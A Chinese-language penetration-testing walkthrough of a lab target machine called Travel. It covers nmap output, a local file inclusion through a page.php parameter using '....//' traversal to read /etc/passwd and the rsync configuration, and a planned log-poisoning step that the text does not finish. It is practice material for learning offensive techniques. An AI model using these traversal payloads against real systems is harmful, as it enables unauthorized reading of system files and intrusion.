# 靶场搭建
下载:Travel
Nat,IP: 192.168.1.178
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Eline | |
|_http-server-header: Apache/2.4.56 (Debian) |
┌──(root㉿kali)-[~] | |
└─# nmap -6 -p- -A fe80::20c:29ff:fe8c:cc8d%eth0 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 08:12 EDT | |
Nmap scan report for fe80::20c:29ff:fe8c:cc8d | |
Host is up (0.0011s latency). | |
Not shown: 65533 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
873/tcp open rsync (protocol version 31) | |
MAC Address: 00:0C:29:8C:CC:8D (VMware) |
F12 看到目录: http://192.168.1.178/page.php?i=index.html
,文件包含: http://192.168.1.178/page.php?i=....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin | |
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin | |
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin | |
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin | |
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin | |
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin | |
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin | |
PL4GU3:x:1000:1000::/home/PL4GU3:/bin/bash | |
ethicrash2:x:1001:1001::/home/ethicrash2:/bin/bash | |
xrdp:x:106:113::/run/xrdp:/usr/sbin/nologin |
http://192.168.1.178/page.php?i=....//....//....//etc/rsyncd.conf
查看 873 端口的 rsync 的配置信息
motd file = /etc/Rsyncd.motd | |
lock file = /var/run/Rsync.lock | |
log file = /var/log/748e62ababa4f1ce54b8970d08ad3eb0.log | |
pid file = /var/run/Rsyncd.pid | |
[rsyncserve] | |
path = /opt/rsyncserve/ | |
comment = Remote file share. | |
uid = 0 | |
gid = 0 | |
read only = yes | |
list = no |
再看看日志: http://192.168.1.178/page.php?i=....//....//..../var/log/748e62ababa4f1ce54b8970d08ad3eb0.log
rsync 访问一下,再看看日志,如果有日志信息那么就可以利用
若只,写不进日志,G 了,靶机废了